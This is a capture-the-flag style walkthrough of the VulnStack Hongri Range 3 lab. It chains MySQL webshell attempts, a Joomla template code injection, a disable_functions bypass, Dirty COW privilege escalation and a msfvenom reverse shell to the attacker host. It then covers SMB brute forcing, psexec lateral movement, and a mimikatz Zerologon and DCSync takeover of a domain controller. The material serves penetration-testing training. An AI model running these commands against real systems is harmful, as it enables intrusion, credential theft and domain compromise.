VulnStack - Hongri Range 3 (紅日靶機三)
Overview
Compared with the previous two ranges, range 3 is somewhat harder and has many rabbit holes. It tests how we weigh and try out the information we already have, and how we prioritize during a penetration test. It involves trial and error with database operations, quickly learning a Joomla CVE, bypassing PHP disable_functions, choosing a Linux kernel privilege escalation, and getting familiar with the msf framework's modules. It covers routing setup, SOCKS proxy usage, SMB brute forcing, psexec lateral movement, and kiwi (mimikatz) usage, and also uses the powerful crackmapexec tool.
Let's learn together.
Environment setup
Range address: http://vulnstack.qiyuanxuetang.net/vuln/detail/5/
After downloading, all 5 hosts are in a suspended state and the accounts are logged in by default. We should first take snapshots of the machines.
Add a host-only network adapter named VMnet2 for the 192.168.93.0 subnet, configured as follows:
The name must be VMnet2. If you already have a VMnet2, just change its subnet.
The CentOS host has two NICs; after starting it we need to restart the network service so that the bridged NIC obtains an IP address:
service network restart
The other four hosts are single-NIC machines on the custom host-only network.
Set the Kali host to a bridged adapter.
Environment setup is complete.
My Kali machine: 192.168.153.37
CentOS: 192.168.153.118, 192.168.93.100
Ubuntu: 192.168.93.120
Win7: 192.168.93.30
Win2012: 192.168.93.10
Win2008: 192.168.93.20
I. nmap scan
1) Host discovery
sudo nmap -sn 192.168.153.0/24 -o hosts
MAC Address: 1E:C4:A8:26:3A:B4 (Unknown)
Nmap scan report for 192.168.153.118
Host is up.
We see 192.168.153.37 as the newly added IP, which should be the CentOS target.
2) Port scan
sudo nmap -sT --min-rate 10000 -p- 192.168.153.118 -o ports
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-01 07:00 CST
Nmap scan report for 192.168.153.118
Host is up (0.00052s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds
3) Detailed service scan
sudo nmap -sT -sV -sC -p22,80,3306 -O 192.168.153.118 -o details
Nmap scan report for 192.168.153.118
Host is up (0.00020s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 2584c6cc2c8a7b8f4a7c60f1a3c9b022 (DSA)
|_ 2048 58d14c592d85ae0769240add720f45a5 (RSA)
80/tcp open http nginx 1.9.4
3306/tcp open mysql?
MAC Address: 00:0C:29:32:46:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct 1 07:07:26 2024 -- 1 IP address (1 host up) scanned in 243.25 seconds
4) Default script scan
sudo nmap --script=vuln -p22,80,3306 192.168.153.118 -o vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-01 07:11 CST
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 84.04% done; ETC: 07:12 (0:00:06 remaining)
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 89.40% done; ETC: 07:12 (0:00:04 remaining)
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 91.90% done; ETC: 07:12 (0:00:04 remaining)
Nmap scan report for 192.168.153.118
Host is up (0.00018s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 333.79 seconds
SSH and MySQL are exposed, so we can first test for weak passwords:
hydra -C /usr/share/wordlists/legion/mysql-betterdefaultpasslist.txt mysql://192.168.153.118
We found a weak MySQL credential.
II. MySQL exploitation (failed)
mysql -u root -h 192.168.153.118 -p123
MySQL [(none)]> show variables like '%secure%';
+--------------------------+-------+
| Variable_name | Value |
+--------------------------+-------+
| require_secure_transport | OFF |
| secure_auth | ON |
| secure_file_priv | |
+--------------------------+-------+
3 rows in set (0.028 sec)
secure_file_priv is empty. We saw the same thing in Hongri range 1: we can try writing a webshell to get an initial foothold.
MySQL [(none)]> show variables like '%general%';
+------------------+---------------------------+
| Variable_name | Value |
+------------------+---------------------------+
| general_log | OFF |
| general_log_file | /var/lib/mysql/ubuntu.log |
+------------------+---------------------------+
2 rows in set (0.002 sec)
MySQL [(none)]> set global general_log=ON;
Query OK, 0 rows affected (0.017 sec)
At this point we hit a problem: we do not know the absolute path of the web directory.
Let's look at the web service for that information.
Try directory brute forcing (after first browsing the default page on port 80, of course):
sudo gobuster dir -u http://192.168.153.118/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hide-length 172
This brute force did not find what we wanted. By specifying file extensions we get a broader and more precise attack surface:
sudo gobuster dir -u http://192.168.153.118/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 404,502 -x php,zip,tar,txt
Of course we can also try several different brute-forcing tools; they use different wordlists and algorithms and may turn up unexpected finds.
dirsearch.py -u http://192.168.153.118
When doing directory brute forcing, be as thorough as possible, so that poor information gathering does not cost you the simplest and most effective penetration path.
Finally we found configuration.php~, which contains the absolute path we wanted.
From this we can reasonably infer that the absolute path is /var/www/html. We also got a bonus: a set of user credentials, testuser:cvcvgjASD!@, which we can try for password reuse.
1) Trying into outfile
Prerequisite
- secure_file_priv is empty, which means MySQL will write files to any location (subject only to the filesystem permissions of the mysqld process).
Back in MySQL, we try running:
select "<?php system($_GET[cmd]); ?>" into outfile "/var/www/html/update.php"
MySQL [(none)]> select "<?php system($_GET[cmd]); ?>" into outfile "/var/www/html/update.php";
ERROR 1 (HY000): Can't create/write to file '/var/www/html/update.php' (Errcode: 13 - Permission denied)
Permission denied: it seems there is still some internal security policy in place. This path is a dead end.
2) Trying log writing
We set the general log output location to /var/www/html/lingx5.php:
MySQL [(none)]> set global general_log=ON;
Query OK, 0 rows affected (0.001 sec)
MySQL [(none)]> set global general_log_file="/var/www/html/lingx5.php";
ERROR 29 (HY000): File '/var/www/html/lingx5.php' not found (Errcode: 13 - Permission denied)
MySQL [(none)]> show variables like '%general%';
+------------------+--------------------------+
| Variable_name | Value |
+------------------+--------------------------+
| general_log | OFF |
| general_log_file | /var/www/html/lingx5.php |
+------------------+--------------------------+
2 rows in set (0.001 sec)
We enabled the log, but changing the log path produced an error.
Checking the log configuration again, the path was successfully changed, but logging itself was switched off (MySQL disables general_log when it cannot open the new file).
This path also fails.
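As an added defender's check (not part of the original post), the following script parses the `show variables` table format printed by the MySQL CLI and rates the file-write exposure probed above: an empty secure_file_priv, and a general log that is ON or pointed under a web root. The WEB_ROOTS list and the function names are assumptions; the sample output is constructed from the values shown above.

```python
# Added defensive check (not from the original post): parse the output of
# `show variables like ...` as printed by the MySQL CLI and rate the
# file-write exposure that the walkthrough above probes.
import re

# Constructed sample, merged from the two `show variables` tables above.
SAMPLE_OUTPUT = """
+--------------------------+---------------------------+
| Variable_name            | Value                     |
+--------------------------+---------------------------+
| require_secure_transport | OFF                       |
| secure_auth              | ON                        |
| secure_file_priv         |                           |
| general_log              | OFF                       |
| general_log_file         | /var/lib/mysql/ubuntu.log |
+--------------------------+---------------------------+
"""

# Assumption: directories a web server typically serves from.
WEB_ROOTS = ("/var/www/", "/usr/share/nginx/", "/srv/www/")


def parse_show_variables(text: str) -> dict:
    """Turn the CLI's boxed table into {variable_name: value}."""
    variables = {}
    for line in text.splitlines():
        if not line.startswith("|"):
            continue  # skip +---+ borders and blank lines
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 2 or cells[0] == "Variable_name":
            continue  # skip the header row
        variables[cells[0]] = cells[1]
    return variables


def assess_file_write_exposure(variables: dict) -> list:
    """Return the findings a hardening review would raise for these settings."""
    findings = []
    if variables.get("secure_file_priv") == "":
        # "" means unrestricted; NULL disables import/export; a directory confines it.
        findings.append("HIGH: secure_file_priv is empty, so SELECT ... INTO OUTFILE "
                        "may write anywhere the mysqld user has filesystem access")
    log_file = variables.get("general_log_file", "")
    if log_file.startswith(WEB_ROOTS):
        findings.append(f"HIGH: general_log_file {log_file} is under a web root")
    if variables.get("general_log", "OFF").upper() == "ON":
        findings.append("MEDIUM: general_log is ON; every query's text, including "
                        "any planted payload, is written to disk")
    return findings
```

Setting secure_file_priv to a dedicated directory such as /var/lib/mysql-files/ (the MySQL packaging default) removes the HIGH finding; the test below exercises that corrected configuration alongside the one from this range.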
III. Web exploitation
We already did directory brute forcing above; let's click through the results.
We find it is a Joomla CMS. It has had vulnerabilities ranging from unauthenticated information disclosure to RCE:
cve-2023-23752: https://vulncheck.com/blog/joomla-for-rce#cve-2023-23752-to-code-execution-1
Anyone who wants to learn more can read that article; of course I will also walk through the steps here (for this range).
We found the default page and the admin backend at /administrator.
We can dig through the database to see whether there are user credentials.
In the joomla database we see the am2zu_users table.
View the column names; this is also a common command when exploiting SQL injection manually:
select column_name from information_schema.columns where table_name="am2zu_users" and table_schema="joomla";
+---------------+
| column_name |
+---------------+
| id |
| name |
| username |
| email |
| password |
| block |
| sendEmail |
| registerDate |
| lastvisitDate |
| activation |
| params |
| lastResetTime |
| resetCount |
| otpKey |
| otep |
| requireReset |
+---------------+
16 rows in set (0.006 sec)
Query the usernames and passwords:
MySQL [joomla]> select id,name,username,password from am2zu_users;
+-----+------------+---------------+--------------------------------------------------------------+
| id  | name       | username      | password                                                     |
+-----+------------+---------------+--------------------------------------------------------------+
| 891 | Super User | administrator | $2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2 |
+-----+------------+---------------+--------------------------------------------------------------+
1 row in set (0.001 sec)
Credential: administrator:$2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2
1) Cracking the password
Try cracking it with hashcat (mode 3200 is bcrypt):
hashcat creds /usr/share/wordlists/rockyou.txt --username -m 3200
hashcat creds /usr/share/wordlists/rockyou.txt --username -m 3200 --show
No success.
2) Changing the password
Joomla's official documentation describes how to reset the password:
Documentation: https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F
Following its Method 2, we reset the password:
update am2zu_users set password = "d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199" where username="administrator";
According to the official documentation, the credential is now administrator:secret.
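The reset above works because Joomla still accepts its legacy md5(password + salt):salt format next to bcrypt, so a direct UPDATE on the users table downgrades the admin hash. As an added example (not from the original post or from Joomla's own code), this script classifies the two hashes quoted above and verifies a legacy-format hash, so a defender reviewing a users-table dump can spot an admin row rewritten from bcrypt to the weak scheme. The rows are constructed from the page's values and the function names are assumptions; bcrypt verification would need the bcrypt library and is not attempted here.

```python
# Added example (not from the original post or Joomla): classify Joomla
# password hashes and verify the legacy md5(password+salt):salt format, to
# detect an admin row downgraded from bcrypt by a direct UPDATE.
import hashlib
import re

# Rows constructed from the values quoted in the walkthrough.
USERS = [
    ("administrator", "$2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2"),
    ("administrator", "d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199"),
]

# 32 lowercase hex digits, a colon, then an alphanumeric salt of up to 32 chars.
LEGACY_RE = re.compile(r"^([0-9a-f]{32}):([A-Za-z0-9]{1,32})$")


def classify_hash(stored: str) -> str:
    """Name the Joomla password scheme a stored hash uses."""
    if stored.startswith("$2y$") or stored.startswith("$2a$"):
        return "bcrypt"            # current Joomla default (hashcat mode 3200)
    if LEGACY_RE.match(stored):
        return "legacy-md5-salt"   # md5(password + salt) ':' salt
    if re.fullmatch(r"[0-9a-f]{32}", stored):
        return "unsalted-md5"
    return "unknown"


def verify_legacy(password: str, stored: str) -> bool:
    """Check a plaintext against Joomla's legacy md5(password + salt):salt form."""
    m = LEGACY_RE.match(stored)
    if not m:
        return False
    digest, salt = m.groups()
    return hashlib.md5((password + salt).encode()).hexdigest() == digest


def audit_users(rows) -> list:
    """Flag accounts whose hash is not bcrypt. On a current Joomla site that is
    either a stale account or evidence of a direct UPDATE on the users table."""
    return [(user, classify_hash(h)) for user, h in rows if classify_hash(h) != "bcrypt"]
```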
3) Starting the exploitation
Login succeeded. Find Templates.
Add the code.
Visit it:
curl -X POST -d "cmd=phpinfo();" -u "administrator:secret" http://192.168.153.118/templates/beez3/index.php > index.html
xdg-open index.html
We see that the target PHP has disable_functions configured, which disables many of the code-execution functions.
IV. Getting a foothold
We need to bypass disable_functions. There are many bypass methods; here we use an AntSword (蟻劍) plugin.
Choose "bypass disable_functions".
Choose PHP7_UserFilter for the bypass.
Commands now run normally, but ip a shows this is the 192.168.93.120 machine, which should be because the target is proxying the requests.
On 192.168.93.120 we search for sensitive files and folders.
We find /tmp/mysql/test.txt, which contains a credential: wwwuser:wwwuser_123Aqx. Try password reuse over SSH:
sudo ssh wwwuser@192.168.153.118 -o HostKeyAlgorithms=+ssh-rsa
Interface 3
============
Name : eth1
Hardware MAC : 00:0c:29:32:46:d3
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.93.100
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fe32:46d3
IPv6 Netmask : ffff:ffff:ffff:ffff::
We obtained regular-user privileges on 192.168.153.118.
So far we have regular-user privileges on two Linux machines, and 192.168.153.118 is dual-homed; its other NIC is 192.168.93.100.
V. Linux privilege escalation
Since this is a range, take a snapshot before escalating privileges, in case the escalation crashes the system.
We need to go further into the internal network, and both Linux machines have low privileges, so we escalate to make the later work easier.
Checking sudo and SUID turned up no commands usable for escalation.
[wwwuser@localhost /]$ uname -a
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
192.168.153.118 runs kernel 2.6.32, so we can search searchsploit for historical vulnerabilities:
searchsploit kernel | grep 2.6.32
Not many; we can try them one by one.
1) 9844 (failed)
python 9844.py
[+] PID:
sh: /proc//fd/1: 沒有那個檔案或目錄
[+] PID:
sh: /proc//fd/1: 沒有那個檔案或目錄
2) 10018 (failed)
3) 25444 (failed)
4) 24459 (failed)
This one needs someone to run su - and enter the correct root password before the escalation completes.
5) dirtycow (succeeded)
Those familiar with Dirty COW (CVE-2016-5195) should react to the version 2.6.32, since it falls within the vulnerability's affected range.
searchsploit dirty cow -m 40839
Escalated to root.
VI. Internal network penetration
1) Getting a session in msf
The msf framework integrates privilege escalation, credential dumping, port scanning, SOCKS proxying and more, which helps the later internal penetration:
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.153.37 lport=4444 -f elf > payload.elf
The session came in to msf successfully.
2) Adding internal routes
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > show options
msf6 post(multi/manage/autoroute) > set subnet 192.168.93.0
subnet => 192.168.93.0
msf6 post(multi/manage/autoroute) > set session 1
session => 1
msf6 post(multi/manage/autoroute) > run
[*] Running module against localhost.localdomain
[*] Searching for subnets to autoroute.
[+] Route added to subnet 192.168.93.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.153.0/255.255.255.0 from host's routing table.
[*] Post module execution completed
3) Initial internal network probing
use auxiliary/scanner/discovery/udp_probe
msf6 auxiliary(scanner/discovery/udp_probe) > set rhosts 192.168.93.2-254
rhosts => 192.168.93.2-254
msf6 auxiliary(scanner/discovery/udp_probe) > set threads 5
threads => 5
msf6 auxiliary(scanner/discovery/udp_probe) > run
Found three machines: 192.168.93.10, 192.168.93.20 and 192.168.93.30.
4) SOCKS proxy configuration
use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > exploit -j
[*] Auxiliary module running as background job 3.
[*] Starting the SOCKS proxy server
sudo apt install proxychains
Edit /etc/proxychains.conf and set the proxy entry to 127.0.0.1 1080.
5) Detailed port scans of the hosts
192.168.93.10
# Nmap 7.93 scan initiated Thu Oct 3 17:41:30 2024 as: nmap -o 10_win 192.168.93.10
Nmap scan report for 192.168.93.10
Host is up (1.1s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
192.168.93.20
# Nmap 7.93 scan initiated Thu Oct 3 17:42:21 2024 as: nmap -o 20_win 192.168.93.20
Nmap scan report for 192.168.93.20
Host is up (0.0030s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49158/tcp open unknown
192.168.93.30
# Nmap 7.93 scan initiated Thu Oct 3 17:40:44 2024 as: nmap -o 30_win 192.168.93.30
Nmap scan report for 192.168.93.30
Host is up (0.0022s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49163/tcp open unknown
All of them have port 445 open; try brute forcing the SMB service.
hydra:
proxychains hydra -l administrator -P '/usr/share/seclists/Passwords/500-worst-passwords.txt' smb://192.168.93.30
You can also use crackmapexec or msf's smb module.
crackmapexec:
proxychains crackmapexec smb 192.168.93.30 -u administrator -p '123qwe!ASD' --local-auth
msf:
use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set smbuser administrator
smbuser => administrator
msf6 auxiliary(scanner/smb/smb_login) > set pass_file /usr/share/seclists/Passwords/500-worst-passwords.txt
pass_file => /usr/share/seclists/Passwords/500-worst-passwords.txt
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.30:445 - 192.168.93.30:445 - Starting SMB login bruteforce
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:/root/passwd.txt',
[!] 192.168.93.30:445 - No active DB -- Credential data will not be saved!
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:123456',
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:password',
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:12345678',
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:1234',
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:pussy',
[+] 192.168.93.30:445 - 192.168.93.30:445 - Success: '.\administrator:123qwe!ASD' Administrator
[*] 192.168.93.30:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.93.30:445 - Bruteforce completed, 1 credential was successful.
[*] 192.168.93.30:445 - You can open an SMB session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed
Brute forced the credential administrator:123qwe!ASD, which can log in to the SMB service.
6) Lateral movement via SMB
use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set rhost 192.168.93.30
rhost => 192.168.93.30
msf6 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf6 exploit(windows/smb/psexec) > set smbpass 123qwe!ASD
smbpass => 123qwe!ASD
msf6 exploit(windows/smb/psexec) > run
We got a session in msf via SMB, and with SYSTEM privileges.
Trying password reuse here, we find that 192.168.93.20 uses the same password:
msf6 exploit(windows/smb/psexec) > set rhost 192.168.93.20
rhost => 192.168.93.20
msf6 exploit(windows/smb/psexec) > run
[*] 192.168.93.20:445 - Connecting to the server...
[*] 192.168.93.20:445 - Authenticating to 192.168.93.20:445 as user 'administrator'...
[*] 192.168.93.20:445 - Selecting PowerShell target
[*] 192.168.93.20:445 - Executing the payload...
[+] 192.168.93.20:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.20:4444
[*] Sending stage (201798 bytes) to 192.168.93.20
[*] Meterpreter session 8 opened (192.168.93.100:54281 -> 192.168.93.20:4444 via session 2) at 2024-10-04 09:06:57 +0800
meterpreter >
systeminfo shows the domain test.org. Ping it:
C:\Windows\system32>ping test.org
ping test.org
Pinging test.org [192.168.93.10] with 32 bytes of data:
Reply from 192.168.93.10: bytes=32 time<1ms TTL=128
Reply from 192.168.93.10: bytes=32 time<1ms TTL=128
Reply from 192.168.93.10: bytes=32 time<1ms TTL=128
Reply from 192.168.93.10: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.93.10:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
The domain controller should be 192.168.93.10.
net view
shows the three hosts in the domain.
7) Lateral movement to the domain controller
Check for the Zerologon vulnerability:
meterpreter > load kiwi
meterpreter > kiwi_cmd sekurlsa::logonpasswords
meterpreter > kiwi_cmd lsadump::zerologon /target:WIN-8GA56TNV3MV.test.org /account:WIN-8GA56TNV3MV$
Attack:
meterpreter > kiwi_cmd lsadump::zerologon /target:WIN-8GA56TNV3MV.test.org /account:WIN-8GA56TNV3MV$ /exploit
The attack succeeded; dump the hashes:
kiwi_cmd lsadump::dcsync /domain:test.org /dc:WIN-8GA56TNV3MV.test.org /user:administrator /authuser:WIN-8GA56TNV3MV$ /authdomain:test /authpassword:"" /authntlm
Credentials:
Hash NTLM: 18edd0cc3227be3bf61ce198835a1d97
ntlm-0: 18edd0cc3227be3bf61ce198835a1d97
ntlm-1: c703941f8ce69a643264ac6f87955b2b
nt1m-2: 2bc31ee9ab29514308035203e98a727c
lm0: 9f8f8b3a6b02ebbc48586f9995cc6b69
lm-1: be62fe8aef5763fe44c55c5308ab9597
The DC administrator's NTLM hash is 18edd0cc3227be3bf61ce198835a1d97.
Finally, restore the DC machine account password so the domain controller does not break:
kiwi_cmd lsadump::postzerologon /target:test.org /account:WIN-8GA56TNV3MV$
8) Pass-the-hash attack (failed)
meterpreter > kiwi_cmd privilege::debug
Privilege '20' OK
meterpreter > kiwi_cmd sekurlsa::pth /user:administrator /domain:test.org /ntlm:18edd0cc3227be3bf61ce198835a1d97
This failed.
9) Dumping from win2008
Earlier, when trying password reuse, we found that 2008's password is the same as Win7's, 123qwe!ASD.
On the 2008 meterpreter run:
meterpreter > load kiwi
meterpreter > creds_all
The output contains the domain controller's plaintext password.
My msf could not log in to the domain controller here.
10) Verifying with crackmapexec
proxychains crackmapexec smb 192.168.93.10 -u administrator -p 'zxcASDqw123!!'
Success: we can access the domain controller.
Summary
Through nmap scanning we found an externally exposed CentOS web machine. After trial and error with MySQL getshell, we exploited the public Joomla vulnerability cve-2023-23752 on the web side and bypassed disable_functions, gaining a foothold on another Ubuntu machine. Searching the Ubuntu box we found credentials for CentOS, then escalated to root with the Dirty COW vulnerability.
Using the dual-homed CentOS machine we set up routing and a proxy, moved laterally into the internal network, brute forced SMB to get the Win7 password, reused the password to obtain a shell on Server 2008, dumped passwords with mimikatz on 2008, and finally took the domain controller.